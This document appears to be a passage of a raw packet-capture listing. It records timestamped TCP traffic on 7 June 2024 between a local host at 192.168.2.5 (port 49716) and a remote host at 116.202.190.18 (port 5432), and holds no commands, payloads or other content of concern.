Jun 7, 2024 17:21:17.328676939 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.328685999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.328711987 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.328718901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.328761101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.328761101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.329235077 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.329263926 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.329313993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.329313993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.329807043 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.329839945 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.329874039 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.329886913 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.329886913 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.329926014 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.330077887 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.330131054 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.330135107 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.330161095 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.330189943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.330193996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.330226898 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.330229044 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.330271959 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.330271959 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.330924034 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.330960035 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.330993891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.331007957 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.331007957 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.331192017 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.331530094 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.331558943 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.331595898 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.331595898 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.331731081 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.331783056 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.331784010 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.331835985 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.331839085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.331867933 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.331902027 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.331907034 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.331907988 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.331995964 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.332684994 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.332714081 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.332758904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.332758904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.332765102 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.332798958 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.332832098 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.332847118 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.332847118 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.332878113 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.333410978 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.333441019 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.333486080 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.333497047 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.333498955 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.333528996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.333563089 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.333569050 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.333569050 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.333626032 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.334336042 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.334386110 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.334393024 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.334420919 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.334454060 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.334462881 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.334462881 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.334487915 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.334528923 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.334528923 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.335078955 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.335131884 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.335145950 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.335166931 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.335200071 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.335213900 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.335213900 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.335256100 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.335963011 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.335992098 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.336042881 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.336055040 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.336055040 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.336077929 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.336112022 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.336119890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.336119890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.336236954 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.336824894 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.336854935 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.336898088 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.336898088 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.336908102 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.336941957 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.336977005 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.336990118 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.336990118 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.337042093 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.337646008 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.337680101 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.337716103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.337726116 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.337749958 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.337764025 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.337764025 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.337802887 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.338483095 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.338512897 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.338563919 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.338563919 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.338566065 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.338601112 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.338629007 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.338634968 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.338654041 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.338706017 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.339097977 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.339131117 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.339164019 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.339179993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.339179993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.339222908 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.339346886 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.339375973 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.339411020 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.339411020 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.339423895 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.339446068 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.339462996 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.339478970 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.339504957 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.339534044 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.340060949 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.340094090 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.340116024 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.340127945 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.340168953 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.340168953 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.340847969 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.340877056 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.340905905 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.340928078 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.340951920 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.340969086 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.341001987 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.341010094 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.341010094 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.341106892 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.342106104 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.342159986 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.342185974 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.342210054 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.342247009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.342259884 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.342259884 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.342276096 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.342302084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.342339039 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.342453003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.342504978 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.342511892 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.342534065 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.342580080 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.342580080 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.342591047 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.342623949 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.342638016 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.342674971 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.343094110 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.343127012 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.343156099 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.343159914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.343204975 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.343204975 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.343566895 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.343601942 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.343636990 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.343645096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.343645096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.343669891 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.343713999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.343713999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.344163895 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.344216108 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.344254017 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.344268084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.344940901 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.344971895 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.345004082 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.345027924 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.346590996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.346642971 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.346645117 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.346674919 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.346715927 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.346715927 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.346884012 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.346939087 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.346957922 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.346991062 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.347027063 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.347043991 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.347043991 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.347090006 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.350518942 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.350572109 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.350580931 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.350606918 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.350620985 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.350657940 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.350677013 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.350677013 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.350694895 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.350712061 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.350728035 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.350749016 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.350763083 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.350785971 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.350815058 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.350825071 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.350848913 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.350883007 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.350920916 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.350934029 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.350967884 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.350984097 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351008892 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351017952 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351044893 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351053953 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351085901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351089954 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351110935 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351142883 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351177931 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351192951 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351192951 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351233006 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351267099 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351283073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351284027 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351300955 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351324081 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351336956 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351361990 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351371050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351404905 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351408958 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351438046 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351452112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351452112 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351473093 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351506948 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351515055 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351541042 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351547956 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351547956 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351573944 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351607084 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351614952 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351614952 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351670027 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351752043 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351802111 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351805925 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351835966 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351859093 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351867914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351914883 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351919889 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351929903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351952076 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351983070 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.351988077 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.351995945 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.352022886 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.352052927 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.352071047 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.352663040 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.352691889 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.352739096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.352739096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.353286028 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.353315115 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.353364944 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.353364944 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.353367090 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.353399992 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.353419065 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.353432894 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.353476048 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.353523970 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.353576899 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.353606939 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.353640079 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.353657007 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.353657007 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.353673935 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.353713989 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.353725910 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.354193926 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.354223013 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.354264021 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.354264021 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.354274035 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.354309082 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.354341984 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.354357004 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.354357004 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.354408979 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.356946945 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.356978893 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357014894 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357032061 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357033014 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357067108 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357105017 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357115030 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.357122898 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.357157946 CEST	5432	49716	116.202.190.18	192.168.2.5
